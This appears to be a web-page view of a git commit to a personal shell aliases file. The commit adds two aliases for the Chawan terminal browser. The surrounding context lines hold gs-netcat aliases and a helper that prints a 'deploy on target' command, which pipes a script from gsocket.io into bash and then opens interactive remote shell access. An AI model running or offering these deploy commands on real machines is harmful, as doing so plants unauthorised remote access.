added chawan aliases
This commit is contained in:
@@ -20,3 +20,8 @@ alias websrv='python3 -m http.server'
|
|||||||
alias gsnc='gs-netcat -i -s'
|
alias gsnc='gs-netcat -i -s'
|
||||||
defalias gssec 's="$(echo "${GS_SEED:?}$1"|sha512sum|base64|tr -d -c a-z0-9)";echo ${s:0:22};unset s'
|
defalias gssec 's="$(echo "${GS_SEED:?}$1"|sha512sum|base64|tr -d -c a-z0-9)";echo ${s:0:22};unset s'
|
||||||
defalias gsdeploycmd 'printf "Deploy on target:\ncurl -fsSL https://gsocket.io/y | X=%s bash\nUndeploy from target:\ncurl -fsSL https://gsocket.io/y | GS_UNDO=1 bash\nAccess:\ngs-netcat -i -s %s\n" $1 $1'
|
defalias gsdeploycmd 'printf "Deploy on target:\ncurl -fsSL https://gsocket.io/y | X=%s bash\nUndeploy from target:\ncurl -fsSL https://gsocket.io/y | GS_UNDO=1 bash\nAccess:\ngs-netcat -i -s %s\n" $1 $1'
|
||||||
|
|
||||||
|
# Chawan browser helpers
|
||||||
|
|
||||||
|
alias bro='cha -o '\''buffer = { scripting="app",cookie="save",meta-refresh="always",styling=true }'\'''
|
||||||
|
alias ibro='cha -o '\''display.image-mode="sixel"'\'' -o '\''buffer = { scripting="app",cookie="save",meta-refresh="always",styling=true , images=true }'\'''
|
||||||
|
|||||||
Reference in New Issue
Block a user